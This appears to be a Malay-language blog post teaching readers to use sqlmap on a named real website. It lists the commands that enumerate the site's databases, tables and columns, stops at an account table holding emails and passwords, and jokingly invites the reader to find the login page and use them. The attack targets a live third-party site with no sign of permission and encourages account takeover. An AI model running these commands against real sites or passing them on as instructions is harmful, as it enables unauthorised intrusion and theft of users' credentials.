01:25
Unknown
 | |
Okkk, jom start :) sebelum tu, barang2 yang korang perlu ade 1 ) Python 2.7 (✎ Klik sini untuk download ) 2 ) Sqlmap (✎ Klik sini untuk download) 3 ) CMD (sama je dengan command prompt) 4 ) vuln website Semua benda dah ready? okkk ▸Firstly, pergi ke Local Disk C, then. buat satu folder dan namakan ' SqlMaps ' ▸Sekarang extract file SqlMaps yang kite dah download tady ke dalam folder ' SqlMaps ' Orite? Now, buka CMD untuk kali ni, admin akan menggunakan vuln website contoh : http://www.mmbuildings.com/newsitem.php?id=61 Okay? kemudian, pergi ke CMD dan type c:\sqlmap\sqlmap.py -u http://www.mmbuildings.com/newsitem.php?id=61 okayy skarang kalau mengikut website yang admin pilih tadi akan keluar dua option iaitu Y/N Now, Type ' N ' sekarang SqlMaps akan automatik shutdown Try yang ni pulak c:\sqlmap\sqlmap.py -u http://www.mmbuildings.com/newsitem.php?id=61 --dbs kalau korang ikut step by step anda sepatutnya akan dapat database Database yang admin dapat contoh : *mm_mm *information_schema ← yang ni kita buang ▸Jadi kita akan pilih → *mm_mm ← Taktau macam mana nak pilih? Taip: c:\sqlmap\sqlmap.py -u http://www.mmbuildings.com/newsitem.php?id=61 -D mm_mm --tables Tunggu dia scan sampai habis. Kemudian kita akan nampak table :) Jadi skarang admin akan pilih tables account (ingat setiap website mempunyai tables yang berlainan) Taip kat CMD : c:\sqlmap\sqlmap.py -u http://www.mmbuildings.com/newsitem.php?id=61 -D mm_mm -T account --columns Yeahh. Sekarang dah nampak 3 columns iaitu email id login access dan password! Pastu nak buat apa? Pikir2 lahh sendiri :v. keh keh~ (cari la login page n Enjoy!) :) |
0 comments:
Post a Comment